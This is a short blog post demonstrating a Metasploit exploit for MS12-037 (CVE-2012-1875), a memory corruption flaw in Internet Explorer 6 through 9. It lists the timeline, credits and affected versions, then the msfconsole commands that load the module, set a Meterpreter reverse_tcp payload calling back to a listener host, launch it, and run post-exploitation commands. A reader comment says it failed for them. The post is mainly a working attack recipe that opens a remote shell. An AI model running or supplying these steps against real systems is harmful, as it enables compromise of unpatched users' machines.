MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-13

PoC provided by :

Dark Son
Qihoo 360 Security Center
Yichong Lin
Google Inc.
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1875
OSVDB-82865
https://twitter.com/binjo/status/212795802974830592

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited in the wild.

Commands :

use exploit/windows/browser/ms12_037_same_id
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

3 thoughts on “MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo

  1. Hello

    exploit is not running

    i tested a XP SP3 on Internet Explorer 8 (8.0.6001.18702)

    what is this msvcrt ROP ?

    My IE8 is crashed.

Comments are closed.